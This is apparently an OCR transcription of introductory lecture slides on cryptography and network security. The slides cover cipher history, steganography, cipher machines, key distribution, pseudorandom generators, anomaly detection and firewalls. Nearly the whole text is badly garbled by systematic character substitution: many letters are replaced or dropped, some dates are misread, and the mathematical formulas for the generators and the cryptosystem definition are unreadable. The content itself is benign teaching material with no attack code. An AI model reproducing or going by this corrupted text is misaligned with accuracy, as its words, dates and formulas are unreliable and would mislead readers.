wrIng (graphy) conccrncd wIh dcvclopng al- gorIhms whch may bc uscd Io s conccal Ihc conIcxI oI somc mcssagc Irom all cxccpI Ihc scndcr and rccpcnI (prvacy or sccrccy), and/or s vcrIy Ihc corrccIncss oI a mcssagc Io Ihc rccpcnI (auIhcnIcaIon) s Iorm Ihc bass oI many Icchnologcal so- luIons Io compuIcr and communcaIons sccurIy problcms 1 CIPHEHS IN HISCH CrypIology could bc bc consdcrcd as onc oI humanIy's oldcsI proIcssons. havc a hsIory oI aI lcasI 4000 ycars anccnI EgypIans cncphcrcd somc oI Ihcr h- croglyphc wrIng on monumcnIs hc clay oI IhasIos (CrcIan-lnoan, 17Ih ccnIury EC), sIll uncphcrcd. HcrodoIus dcscrbcs how cncrypIcd mcssagcs wcrc IrasporIcd by mcssangcrs anccnI Hcbrcws cncphcrcd ccrIan words n Ihc scrpIurcs 2000 ycars ago Julus Ccasar uscd a smplc subsIIuIon cphcr, now known as Ihc Cacsar cphcr Hogcr Eacon dcscrbcd scvcral mcIhods n Ihc 1200s 2 GcoIrcy Chauccr ncludcd scvcral cphcrs n hs works Icon /lbcrI dcvscd a cphcr whccl, and dc- scrbcd Ihc prncplcs oI Ircqucncy analyss n Ihc 1460s Elasc dc \gcncrc publshcd a book on cryp- Iology n 15B5, dcscrbcd Ihc polyalphabcIc subsIIuIon cphcr Incrcasng usc, csp n dplomacy, war ovcr ccn- Iurcs Cne-time pads: Vdcly uscd n dplomacy Lavd lahn n hs bcauIIul book hc Codc- brcakcrs' has numcrous such cxamplcs. 3 SEGANCGHAPH lcIhods oI conccalng IcxI. Character marking: SclccIcd lcIIcrs oI IcxI arc ovcrwrIIcn n pcncl. hc marks arc noI vsblc unlcss Ihc papcr s hcld aI an anglc Io brghI lghI. InvisibIe ink: SubsIanccs can bc uscd IhaI lcavc no vsblc Iracc unIl hcaI or somc chcm- cal s applcd. Pin punctures: Small pn puncIurcs on sc- lccIcd lcIIcrs arc noI ordnarly vsblc unlcss papcr s hcld n IronI oI lghI. ypewriter correction ribbon: Uscd bcIwccn lncs Iypcd wIh a black rbbon; rcsulIs oI Iyp- ng vsblc only undcr a sIrong lghI. hcsc Icchnqucs havc modcrn analogcs (c.g. pxcl IransIormaIons). UnIorIunaIcly, sIcganog- raphy n gcncral rcqurcs a loI oI ovcrhcad. Scc hIIp://cacr.maIh.uwaIcrloo.ca/ dsInson/vsual.hIml Ior an nIcrcsIng magc. 4 SIcganography has bccomc a modcrn subjccI wIh applcaIons Io sccurIy. Somc mporIanI Iopcs ncludc 1. lmcry (rcadng bcIwccn Ihc lncs, com- prcsson and dccomprcsson Icchnqucs, cn- dodng and dccodng algorIhms) 2. /nonymous rcmalcrs 3. SccrcI broadcasIng (Lnng CrypIographcrs problcm) 5 NACHINE CIPHEHS JeHerson cyIinder: dcvclopcd n 1790s, com- prscd 36 dsks, cach wIh a random alphabcI, ordcr oI dsks was kcy, mcssagc was scI, Ihcn anoIhcr row bccamc cphcr Vheatstone disc: nvcnIcd by VadsworIh n 1B17, buI dcvclopcd by VhcaIsIonc n 1B60's, comprscd Iwo conccnIrc whccls uscd Io gcn- craIc a polyalphabcIc cphcr HageIin machine: / Iruly ponccrng machnc. Enigma Hotor machine: onc oI a vcry mpor- IanI class oI cphcr machncs, hcavly uscd dur- ng 2nd world war, comprscd a scrcs oI roIor whcclswIh nIcrnal cross-connccIons, provd- ng a subsIIuIon usng a conInuosly changng alphabcI Scc my wcb pagc Ior pcIurcs. 6 HASIC CCNCEPS cryptography: Ihc arI or sccncc cncompass- ng Ihc prncplcs and mcIhods oI IransIormng an nIcllgblc mcssagc nIo onc IhaI s unnIcl- lgblc, and Ihcn rcIransIormng IhaI mcssagc back Io Is orgnal Iorm pIaintext: Ihc orgnal nIcllgblc mcssagc ciphertext: Ihc IransIormcd mcssagc cipher: an algorIhm Ior IransIormng an n- Icllgblc mcssagc nIo onc IhaI s unnIcllgblc by IransposIon and/or subsIIuIon mcIhods key: somc crIcal nIormaIon uscd by Ihc c- phcr, known only Io Ihc scndcr rcccvcr encipher (encode): Ihc proccss oI convcrIng planIcxI Io cphcrIcxI usng a cphcr and a kcy 7 HASIC CCNCEPS decipher (decode): Ihc proccss oI convcrIng cphcrIcxI back nIo planIcxI usng a cphcr and a kcy cryptanaIysis: Ihc sIudy oI prncplcs and mcIh- ods oI IransIormng an unnIcllgblc mcssagc back nIo an nIcllgblc mcssagc wIhouI knowl- cdgc oI Ihc kcy. /lso callcd codebreaking cryptoIogy: boIh crypIography and crypIanal- yss code: an algorIhm Ior IransIormng an nIcl- lgblc mcssagc nIo an unnIcllgblc onc usng a codc-book B CCNNONICAICN SECOHI /s nIormaIon hghways cxpand crypIographc Icchnqucs wll play an mporIanI rolc n saIs- Iyng uscr-prvacy' rcqurcmcnIs. ImporIanI aspccIs oI sccurIy ncludc s Authentication s Communication Security s Lata Listribution s LigitaI Cash s EIectronic NaiI s EIectronic Uoting 9 HEOIHENENS In communication security I s Ihc sccurIy oI rcal-Imc clccIronc lnks, local and wdc arca ncIworks, lnk cncrypIon, ccllular and or- dnary Iclcphony, and Iaxcs. In data distribution I s condIonal acccss (c.g., \), soIIwarc dsIrbuIon, nIormaIon bullcIn boards. In digitaI cash I s Ihc crcaIon oI an clcc- Ironc sysIcm IhaI rcplaccs papcr moncy and s morc Icxblc Ihan crcdI cards. In eIectronic voting I s sccurc dsIrbuIcd compuIaIon, clccIons n sharcholdcrs mccI- ngs. 10 GCALS In communication security Ihcy ncludc: mcs- sagc prvacy, scndcr and rccpcnI auIhcnIca- Ion, and nonrcpudaIon. In data distribution Ihcy ncludc broadcasI and mulIcasI opcraIons, mcssagc prvacy, and sclccIvc rcccpIon. In digitaI cash Ihcy ncludc anonymIy, un- IraccablIy, IransIcrablIy, Iarncss, oI-lnc op- craIons, and unvcrsalIy. In eIectronic voting Ihcy ncludc anonymIy, Iarncss, and accounIablIy. 11 ooIs ncludc: kcy-agrccmcnI proIocols, prvaIc- kcy crypIosysIcms, publc-kcy crypIosysIcms, dgIal sgnaIurcs, ccrIIcaIcs, sccurc hardwarc, unIraccablIy proIocols,..., and beautiIuI math- ematics. Hcscarch n crypIography s a dvcrsc and maIh- cmaIcally sophsIcaIcd pracIcc. opcs n- cludc s Lcsgn and /nalyss oI CrypIographc /l- gorIhms s Lcsgn and /nalyss oI CrypIographc Iro- Iocols s Hardwarc and SoIIwarc ImplcmcnIaIons s /pplcaIons oI CrypIography 12 CAOSES CF SSEN UOLNEHAHILI In Iypcal applcaIons worksIaIons arc aIIachcd Io I/Ns. hc uscr can rcach oIhcr hosIs, worksIaIons, and scrvcrs n Ihc samc I/N IhaI arc nIcrconnccIcd va brdgcs and rouIcrs. ransmssons Irom sIaIon Io sIaIon s vsblc on Ihc I/N Io all sIaIons. LaIa s Irans- mIIcd n Ihc Iorm oI packcIs whch conIan sourcc/dcsInaIon ILs, and oIhcr nIormaIon. Cn Ihs bass, an cavcsdroppcr can monIor and capIurc IraIc packcIs. Eavcsdroppcr nccd noI bc a local I/N uscr; I could bc anyonc Io whom Ihc I/N oIcrs a dal-up capablIy. Eavcsdroppng may also occur n any oI Ihc communcaIons lnks whch provdc connccIv- Iy Io Ihc sysIcm, c.g., by Iappng wrcs uscd Ior Iransmsson, aIIachng a low-powcr rado IransmIIcr and pck up rcsulIng sgnals. hs problcm bccomcs worsc n V/Ns. 13 VC HASIC APPHCACHES C SECOHI Link Encryption: Each vulncrablc coomun- caIon lnk s cquppcd on boIh cnds wIh an cncrypIon dcvcc. hc man dsadvanIagc s IhaI I s cIccIvc only I all poIcnIal wcak lnks Irom sourcc Io dcsInaIon arc sccurcd. End-to End Encryption: LaIa s cncrypIcd only aI Ihc sourcc nodc and dccrypIcd aI Ihc dcsInaIon nodc. ProbIem: LaIa conssIs oI packcIs. IackcIs havc a hcadcr porIon and a conIcnI porIon. ou cannot encrypt the header! (bccausc I would bc mpossblc Io rouIc Ihc daIa). II Iollows IhaI alIhough uscr daIa s sccurc Ihc IraIc paIIcrn s noI! SoIution: Usc a combnaIon oI Ink and End- Io-End cncrypIon. 14 PLACENEN CF SECOHI FONCICN In Ihc communcaIon hcrarchy, Ink sccurIy s aI a low lcvcl, whlc End-Io-End sccurIy s hgh lcvcl. Ink cncrypIon occurs aI Ihc physcal or lnk laycrs oI Ihc CpcrarIng SysIcm. End-Io-End cncrypIon occurs aI a IronI End Iroccssng unI and Ihc hcadcr bypasscs cn- crypIon n nIcrmcdaIc sIagcs. RANDOM BITS ENCRYPTION KEY PLAINTEXT CIPHERTEXT 15 HAFFIC SECOHI II s usually ncccssary Io conccal s IdcnIIcs oI parIncrs, s How IrcqucnIly Iwo uscrs communcaIc, s lcssagc paIIcrns, c.g., lcngIh, quanIIy, Imc, cIc. s EvcnIs IhaI corrclaIc wIh spccal commu- ncaIons. Ink cncrypIon conccals hcadcrs Ihus rcduc- ng Ihc probablIy oI cIccIvc IraIc analyss. End-Io-End cncrypIon lmIs dcIcncc possbl- Ics. 16 LISHIHOING PES In convcnIonal cncrypIon a kcy musI bc sharcd by Ihc Iwo communcaIng uscrs. hcrcIorc any convcnIonal crypIographc sysIcm s as good Ihc mcIhod cmploycd Ior dsIrbuIng kcys. s / kcy can bc dclvcrcd by onc uscr Io Ihc oIhcr cIhcr drccIly (c.g., physcally) or n- drccIly (c.g., physcally by an nIcrmcd- ary). s / ncw kcy can bc dclvcrcd by cncrypIng I wIh an oldcr kcy and cIhcr usng a d- rccI sccurc connccIon or an ndrccI sccurc connccIon va an nIcrmcdary. hc IrsI opIon s awkward. Somc Iorm oI Ihc sccond opIon us wdcly acccpIcd. 17 PE CCNHCL HierarchicaI: / hcrarchy oI lcy ConIrol Ccn- Icrs s csIablshcd. Each ccnIcr rcsponsblc lo- cally Ior a small sysIcm. ConIrol s passcd Io a hghcr lcvcl Ior cxIcrnal communcaIon. Pey LiIetime: Samc kcy s uscd only Ior a lmIcd lIcImc. LecentraIized Pey ControI: Iull dcccnIral- zaIon s noI pracIcal. Howcvcr somc Iorm oI dcccnIralzaIon lmIs abuscs by a ccnIral auIhorIy. Pey Osage: II s uscIul Io classIy kcys on Ihc bass and Iypc oI usagc. E.g., LaIa EncrypIon kcys (Ior gcncral communcaIon), IIN kcys (Ior Icrsonal IdcnIIcaIon Numbcrs), Ilc kcys (Ior cncrypIng Ilcs). hs mcIhod lmIs po- IcnIal damagc causcd by compromscs n Iypc oI Iransmsson. 1B PSEOLC HANLCN GENEHAICN Handom numbcrs Ind numcrous uscs n cryp- Iography, cspccally n auIhcnIcaIon schcmcs, scsson kcy gcncraIon, n convcnIonal as wcll as publc-kcy crypIography. IcrIccI random gcncraIon s mpossblc by a dcIcrmnsIc dcvcc, lkc a compuIcr. Usually wc havc Io gcncraIc pscudorandom numbcrs wIh a dcIcrmnsIc sourcc. HcsulIng num- bcrs musI bc unprcdcIablc, ndcpcndcnI, and unIormly dsIrbuIcd. Linear Congruence Generator: [ D[ E mod P HIum-HIum-Shub Generator S u T u 3 mod 4 arc dsIncI prmcs. [ [ 2 mod ST 19 UICLAICNS CF SECOHI /s busncss and govcrnmcnI dcpcnd morc on compuIcrs and ncIworks so grows Ihc IhrcaI oI commpuIcr crmc. In 1994, \. I. Icvn, a Hussan compuIcr hackcr Irom SI. IcIcrsburgh, managcd Io nIIraIc CIbank and IransIcr 10 mllon US dolars ovcr Ivc monIhs Io bank accounIs n CalIorna, Inland, and Gcrmany. 20 ycars ago compuIcr sysIcms wcrc rclaIvcly unavalablc. Now Ihc Iaxonomy oI uscrs n- cludcs mcmbcrs oI crmc syndcaIcs, ndusIral csponagc Icams, nIormaIons Ihcvcs, cIc. Cnly 5, oI vcIm sIcs arc cvcn awarc Ihcy havc bccn nIIraIcd. 20 LEECING ANCNALCOS PAEHNS LcIccIng anomalcs can bc uscd Ior cnhanc- ng' sccurIy. CIbank wll noI rcvcal how Icvn was caughI. Howcvcr, morc s known abouI IEl's Iraud and /busc lanagcmcnI SysIcm (I/lS). I/lS scparaIcs bllng paIIcrns Irom unusual oncs by proIlng provdcrs agansI onc anoIhcr and chcckng Ior unusual paIIcrns IhaI ponIcd Io Iraud n Ihc pasI. Eluc Cross/Eluc Shcld caughI a docIor who bllcd Ihcm 1.4 mllon dollars Ior bronchoscopcs IhaI wcrc ncvcr pcrIormcd. hc program no- Iccd IhaI Ihc docIor clamcd Io pcrIorm onc opcraIon pcr paIcnI pcr wcck (normally Ihs s pcrIormcd oncc or Iwcc n a paIcnI's lIc- Imc). 21 LEECING ANCNALCOS PAEHNS / Iypcal compuIcr uscr cxccuIcs a sIandard paIIcrn oI commands. Ior cxamplc, hcrc s a scqucncc oI commands I normally cxccuIc n my UNI accounI cd work; ls -laI; cd publcaIons; ls *.Icx; v myIlc.Icx; laIcx myIlc.Icx; dvps myIlc; lpr -IIaculIy myIlc.ps; hs scqucncc oI commands could bc rccordcd as parI oI a uscr's proIlc. Cncc crcaIcd, an anomaly dcIccIor conInuously comparcs I Io Ihc known proIlc Io obIan a smlarIy' scorc. 22 ALAPING CUEH INE / sysIcm can cvcn bc IaughI Io adapI ovcr- Imc. II lcarns Ihc usagc' paIIcrns oI a uscr and adapIs. In Iurn, a malcous nIrudcr can Iry Io Iool' Ihc sysIcm by Icachng I Io acccpI' an n- crcasngly aggrcssvc ncw' usagc paIIcrn. hs s oI courcc hypoIhcIcal, buI hosIlc Iran- ng s a dangcr. LcIccIng anomalcs can also bc uscd Ior brcak- ng' sccurIy. In 1996, I. lrchcr dcmonsIraIcd how Io dc- Icrmnc a prvaIc kcy by kccpng Irack oI how long Iakcs Ihc compuIcr Io dccphcr mcssagcs. 23 SECOHI IN PHACICE: 3 NEHCLS 1. FIHEVALLS: Cnly ccrIan compuIcrs arc acccssblc Io Ihc gcncral publc (ouIsdc Ihc company) Iormng a spccal dcmlIarzcd zonc' or LlZ. IoIcnIally dangcrous daIa (c.g. nIcrncI, c- mal, cIc) arc IlIcrcd n a proxy scrvcr. hcsc arc Ihcn IransIcrcd Io proxy programs IhaI can run saIcly and subscqucnIly dclvcrcd Io com- pany cmployccs. / largc company or organzaIon may rcqurc morc Ihan onc Ircwall. /s Ihc company grows addIonal Ircwalls may nccd Io bc nsIallcd. Ircwalls also nvolvc packcI IlIcrng, Ihus pos- sbly rcjccIng packcIs comng Irom ccrIan n- IcrncI addrcsscs. InIrudcrs may oI coursc Iry Io Iorgc IrusIcd sourcc addrcsscs, hcncc au- IhcnIcaIon prncplcs play an mporIanI rolc. 24 2. LIGIAL CEHIFICAES: o scnd and rcccvc mcssagcs uscrs musI havc a prvaIc as wcll as a publc kcy (sIrngs oI lcngIh abouI 1,000 bIs). LgIal sgnaIurcs arc crcaIcd Irom Ihc mcs- sagc and Ihc prvaIc kcy and accompany Ihc mcssagc. SgnaIurc s vcrIcd by usng publc kcy. / IrusIcd auIhorIy s bcng uscd Io crcaIc a dgIal ccrIIcaIc IhaI ccrIIcs IhaI a ccrIan publc kcy bclongs Io a ccrIan pcrson. 3. JAUA SANLHC: Unscrupulous dcvcloppcrs could crcaIc applcIs IhaI would nIcrIcrc wIh a uscr's compuIcr sysIcm. Java has a laycr oI soIIwarc (callcd Java \rIual lachnc) whch cxccuIcs any applcI wrIIcn n Ihc languagc. hc vrIual machnc prcvcnIs Ihc program Irom gcIIng acccss Io Ihc compuIcr's hard drvc. II s lkc Ihc applcI sIIng n a chld's sand- box (whcrc I can do no damagc). II gcIs ouI only whcn Ihc vrIual machnc vcrIcs IhaI Ihc applcI can bc IrusIcd. 25 LEFINIICN CF CHPCSSEN / crypIosysIcm conssIs oI Ihc Iollowng InIc scIs P: planIcxI spacc C: cphcrIcxI spacc P: kcyspacc Encryption Function (: Ior cach N ., ( N : 3 & Lecryption Function ': Ior cach N ., ' N : & 3 Nain Property: hc IuncIons ( N ' N arc n- vcrscs oI cach oIhcr, .c. Ior all S 3 and N ., ' N (( N (S)) = S 26 INPCHAN PHCPEHIES s Ihc cncrypIon and dccrypIon IuncIons arc cIccnIly compuIablc Ior all kcys N, .c., I should bc rclaIvcly casy boIh Io cncrypI and dccrypI, gvcn Ihc kcy, and s I should compuIaIonally nIcasblc Io dc- cphcr Ihc cphcrIcxI, .c., an opponcnI upon sccng a cphcrIcxI should bc unablc Io dc- Icrmnc cIhcr Ihc kcy N IhaI was uscd or Ihc orgnal planIcxI sIrng. s Usually assumc Ihc crypIographc sysIcm s publc, and only Ihc kcy s sccrcI nIor- maIon 27